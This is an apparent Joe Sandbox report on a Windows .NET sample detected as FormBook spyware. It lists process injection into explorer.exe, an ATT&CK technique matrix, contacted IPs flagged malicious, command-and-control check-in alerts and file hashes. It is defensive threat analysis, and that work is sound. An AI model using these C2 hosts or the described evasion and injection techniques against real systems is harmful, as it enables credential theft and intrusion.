          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 3 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph figure. Behavior Graph ID: 356555; Sample: 0O9BJfVJi6fEMoS.exe; Startdate: 23/02/2021; Architecture: WINDOWS; Score: 100. Process chain shown: 0O9BJfVJi6fEMoS.exe (started) -> 0O9BJfVJi6fEMoS.exe (started) -> explorer.exe (injected) -> explorer.exe and autofmt.exe (started); the second explorer.exe -> cmd.exe (started) -> conhost.exe (started).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          0O9BJfVJi6fEMoS.exe | 22% | ReversingLabs | Win32.Spyware.Convagent

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.0O9BJfVJi6fEMoS.exe.32e0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          11.2.explorer.exe.13e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner
          karthikeyainfraindia.com | 0% | Virustotal
          td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal
          www.besteprobioticakopen.online | 1% | Virustotal

          URLs


          Domains and IPs

          Contacted Domains


          Contacted URLs


          URLs from Memory and Binaries

                                                              high
                                                              http://www.blueletterbible.org/Bible.cfm?b=0O9BJfVJi6fEMoS.exefalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/DPlease0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers80O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=comexplorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.%s.comPAexplorer.exe, 00000007.00000002.913073739.0000000002B50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    low
                                                                    http://www.fonts.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.kr0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPlease0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cn0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sakkal.com0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=comexplorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpfalse
                                                                        high

                                                                        Contacted IPs


                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
202.66.173.116 | unknown | India | 17439 | NETMAGIC-APNetmagicDatacenterMumbaiIN | true
35.246.6.109 | unknown | United States | 15169 | GOOGLEUS | true
94.23.162.163 | unknown | France | 16276 | OVHFR | true
118.27.99.84 | unknown | Japan | 7506 | INTERQGMOInternetIncJP | true
160.153.136.3 | unknown | United States | 21501 | GODADDY-AMSDE | true
142.91.239.112 | unknown | United States | 395954 | LEASEWEB-USA-LAX-11US | true
23.227.38.74 | unknown | Canada | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
184.106.16.223 | unknown | United States | 19994 | RACKSPACEUS | true

                                                                        General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356555
Start date: 23.02.2021
Start time: 10:05:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 0O9BJfVJi6fEMoS.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/1@12/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 18.3% (good quality ratio 16.7%)
• Quality average: 74.4%
• Quality standard deviation: 31%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 189
• Number of non-executed functions: 152
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 51.104.144.132, 13.64.90.137, 40.88.32.150, 92.122.145.220, 104.42.151.234, 13.88.21.125, 168.61.161.212, 104.43.193.48, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.132.208.181
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                        Simulations

                                                                        Behavior and APIs

Time | Type | Description
10:06:32 | API Interceptor | 2x Sleep call for process: 0O9BJfVJi6fEMoS.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs


                                                                        Domains


                                                                        ASN


                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.log
                                                                        Process:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.607328217239554
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:0O9BJfVJi6fEMoS.exe
                                                                        File size:816640
                                                                        MD5:18ec78e09155c046a203fb4dcbc3593f
                                                                        SHA1:40e67eef7c001a8752763616fc9a58170721c27a
                                                                        SHA256:01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
                                                                        SHA512:28801c6b546515f4fb67f199f70b160dffb41434bcb465f92d3f20dbad698194f162b443571ea267a1dd7c7ef0bcaf4bb82116c37d3a83433f9d3de28083234e
                                                                        SSDEEP:6144:kxwz1c/yd0cGqrtttttwgGCyWI+XEmlm4gA2YhFp0ksvQZIcQXzjUIBElb6oBbc3:J/wCEzmg4sYhgkqXzwOw47Zf5
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...HO4`..............0......^.......5... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:f0cac2d8dcdcd43c

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4a35a2
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x60344F48 [Tue Feb 23 00:41:44 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al

                                                                        Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa3550          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa4000          0x25bbc       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xca000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                        Sections

                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x2000 | 0xa15a8 | 0xa1600 | False | 0.614729073877 | data | 6.73482892529 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0xa4000 | 0x25bbc | 0x25c00 | False | 0.40512468957 | data | 5.78348290735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc | 0xca000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name | RVA | Size | Type | Language | Country
                                                                        RT_ICON | 0xa42b0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xa84d8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xac700 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xb0928 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xb4b50 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xb8d78 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xbcfa0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xc11c8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_ICON | 0xc53f0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                        RT_GROUP_ICON | 0xc9618 | 0x84 | data | |
                                                                        RT_VERSION | 0xc969c | 0x334 | data | |
                                                                        RT_MANIFEST | 0xc99d0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                        Imports

                                                                        DLL | Import
                                                                        mscoree.dll | _CorExeMain

                                                                        Version Infos

                                                                        Description | Data
                                                                        Translation | 0x0000 0x04b0
                                                                        LegalCopyright | Excel
                                                                        Assembly Version | 1.3.6.9
                                                                        InternalName | 5uoa.exe
                                                                        FileVersion | 1.3.6.9
                                                                        CompanyName | Microsoft
                                                                        LegalTrademarks | Excel
                                                                        Comments | Excel
                                                                        ProductName | Microsoft
                                                                        ProductVersion | 1.3.6.9
                                                                        FileDescription | Excel
                                                                        OriginalFilename | 5uoa.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                        02/23/21-10:07:40.155996 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49761 | 23.227.38.74 | 192.168.2.4
                                                                        02/23/21-10:07:50.751897 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49763 | 34.102.136.180 | 192.168.2.4
                                                                        02/23/21-10:07:56.064671 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 184.106.16.223
                                                                        02/23/21-10:07:56.064671 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 184.106.16.223
                                                                        02/23/21-10:07:56.064671 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 184.106.16.223
                                                                        02/23/21-10:08:08.227961 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 202.66.173.116
                                                                        02/23/21-10:08:08.227961 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 202.66.173.116
                                                                        02/23/21-10:08:08.227961 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 202.66.173.116
                                                                        02/23/21-10:08:23.806049 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 94.23.162.163
                                                                        02/23/21-10:08:23.806049 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 94.23.162.163
                                                                        02/23/21-10:08:23.806049 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 94.23.162.163

                                                                        TCP Packets


                                                                        UDP Packets

                                                                        Feb 23, 2021 10:08:17.635176897 CET6420653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:17.703160048 CET53642068.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:18.501543045 CET5090453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:18.562619925 CET53509048.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:23.691322088 CET5752553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:23.758831978 CET53575258.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:28.857777119 CET5381453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:29.010719061 CET53538148.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:34.280643940 CET5341853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:34.656076908 CET53534188.8.8.8192.168.2.4

                                                                        DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Feb 23, 2021 10:07:33.788086891 CET | 192.168.2.4 | 8.8.8.8 | 0xbdbf | Standard query (0) | www.fastenerspelosato.net | A (IP address) | IN (0x0001) |
